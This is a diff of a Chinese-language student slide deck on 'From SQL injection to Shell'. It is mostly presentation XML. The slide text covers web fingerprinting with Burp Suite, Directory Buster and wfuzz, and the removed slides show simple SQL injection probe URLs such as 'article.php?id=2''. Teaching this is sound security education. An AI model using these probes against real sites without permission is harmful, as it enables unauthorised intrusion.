--- a/2016-2/zc_snRNA/FlippedClassroom_FromSqlInjectionToShell/From SQL injection to Shell.pptx
+++ b/2016-2/zc_snRNA/FlippedClassroom_FromSqlInjectionToShell/From SQL injection to Shell.pptx
@@ -6,24 +6,33 @@
   </p:sldMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
-    <p:sldId id="257" r:id="rId3"/>
-    <p:sldId id="263" r:id="rId4"/>
-    <p:sldId id="271" r:id="rId5"/>
-    <p:sldId id="274" r:id="rId6"/>
-    <p:sldId id="272" r:id="rId7"/>
-    <p:sldId id="275" r:id="rId8"/>
-    <p:sldId id="264" r:id="rId9"/>
-    <p:sldId id="266" r:id="rId10"/>
-    <p:sldId id="267" r:id="rId11"/>
-    <p:sldId id="276" r:id="rId12"/>
-    <p:sldId id="277" r:id="rId13"/>
-    <p:sldId id="278" r:id="rId14"/>
-    <p:sldId id="279" r:id="rId15"/>
-    <p:sldId id="280" r:id="rId16"/>
-    <p:sldId id="281" r:id="rId17"/>
-    <p:sldId id="268" r:id="rId18"/>
-    <p:sldId id="270" r:id="rId19"/>
-    <p:sldId id="282" r:id="rId20"/>
+    <p:sldId id="284" r:id="rId3"/>
+    <p:sldId id="285" r:id="rId4"/>
+    <p:sldId id="283" r:id="rId5"/>
+    <p:sldId id="264" r:id="rId6"/>
+    <p:sldId id="286" r:id="rId7"/>
+    <p:sldId id="266" r:id="rId8"/>
+    <p:sldId id="287" r:id="rId9"/>
+    <p:sldId id="288" r:id="rId10"/>
+    <p:sldId id="289" r:id="rId11"/>
+    <p:sldId id="290" r:id="rId12"/>
+    <p:sldId id="267" r:id="rId13"/>
+    <p:sldId id="276" r:id="rId14"/>
+    <p:sldId id="277" r:id="rId15"/>
+    <p:sldId id="278" r:id="rId16"/>
+    <p:sldId id="279" r:id="rId17"/>
+    <p:sldId id="280" r:id="rId18"/>
+    <p:sldId id="291" r:id="rId19"/>
+    <p:sldId id="292" r:id="rId20"/>
+    <p:sldId id="281" r:id="rId21"/>
+    <p:sldId id="293" r:id="rId22"/>
+    <p:sldId id="294" r:id="rId23"/>
+    <p:sldId id="268" r:id="rId24"/>
+    <p:sldId id="295" r:id="rId25"/>
+    <p:sldId id="270" r:id="rId26"/>
+    <p:sldId id="296" r:id="rId27"/>
+    <p:sldId id="297" r:id="rId28"/>
+    <p:sldId id="282" r:id="rId29"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -130,6 +139,18 @@
 </p:presentation>
 </file>
 
+<file path=ppt/commentAuthors.xml><?xml version="1.0" encoding="utf-8"?>
+<p:cmAuthorLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cmAuthor id="1" name="chang zhao" initials="cz" lastIdx="2" clrIdx="0">
+    <p:extLst>
+      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
+        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="bb51b52c8ee09433" providerId="Windows Live"/>
+      </p:ext>
+    </p:extLst>
+  </p:cmAuthor>
+</p:cmAuthorLst>
+</file>
+
 <file path=ppt/slideLayouts/slideLayout1.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="title" preserve="1">
   <p:cSld name="标题幻灯片">
@@ -301,7 +322,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -613,7 +634,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -835,7 +856,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -1126,7 +1147,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -1580,7 +1601,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -2156,7 +2177,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3008,7 +3029,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3213,7 +3234,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3427,7 +3448,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3632,7 +3653,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3912,7 +3933,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4179,7 +4200,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4594,7 +4615,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4742,7 +4763,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4867,7 +4888,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -5146,7 +5167,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -5458,7 +5479,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -5711,7 +5732,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/16</a:t>
+              <a:t>2016/10/29</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -6196,7 +6217,7 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="副标题 3"/>
+          <p:cNvPr id="3" name="副标题 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -6209,7 +6230,11 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>小组成员：赵畅 宋楠</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6243,259 +6268,162 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="标题 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913149" y="254657"/>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="内容占位符 3"/>
+          <p:cNvPicPr>
+            <a:picLocks noGrp="1" noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1669164" y="2697252"/>
+            <a:ext cx="7255063" cy="3171285"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="文本框 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1669164" y="1905781"/>
+            <a:ext cx="7134597" cy="646331"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>使用应用程序如</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Burp Suite</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>（</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>http://portswigger.net/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>）设置为一个</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>代理</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>可以</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>很容易地获取相同的信息：</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="标题 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1050253" y="309604"/>
             <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
             <a:normAutofit/>
           </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
-              <a:t>注入</a:t>
-            </a:r>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:buNone/>
+              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
-              <a:t>和利用</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913774" y="1850834"/>
-            <a:ext cx="10698004" cy="3940365"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>1.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>嗅探</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>：</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>猜想</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器上脚本</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>整型参数试探</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>article.php?id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>=2'</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>  如果报错语法错误，说明存在漏洞</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>从</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>的语法来看，不难理解</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>article.php?id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>=2-1 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>不报错，如果显示是</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>图则存在漏洞</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>字符型参数</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>试探</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>如果</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>加</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>个  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>'</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>   将报错</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>如果加</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>2</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>个 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>'</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>不</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>报错</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>指纹收集 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>检查</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>HTTP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>头</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1119901166"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3229565521"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6524,45 +6452,69 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="标题 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913149" y="254657"/>
+          <p:cNvPr id="6" name="标题 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1050253" y="309604"/>
             <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
             <a:normAutofit/>
           </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
-              <a:t>注入</a:t>
-            </a:r>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:buNone/>
+              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
-              <a:t>和利用</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
+              <a:t>指纹收集 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>–</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
+              <a:t>directory Buster</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="内容占位符 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -6572,8 +6524,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913774" y="1850834"/>
-            <a:ext cx="10698004" cy="3940365"/>
+            <a:off x="1050878" y="1793886"/>
+            <a:ext cx="10363826" cy="3419559"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -6581,128 +6533,394 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>2.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>开发</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入漏洞</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>工具</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>wfuzz</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>（</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>http://www.edge-security.com/wfuzz.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>）可以用来检测目录和使用蛮力的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
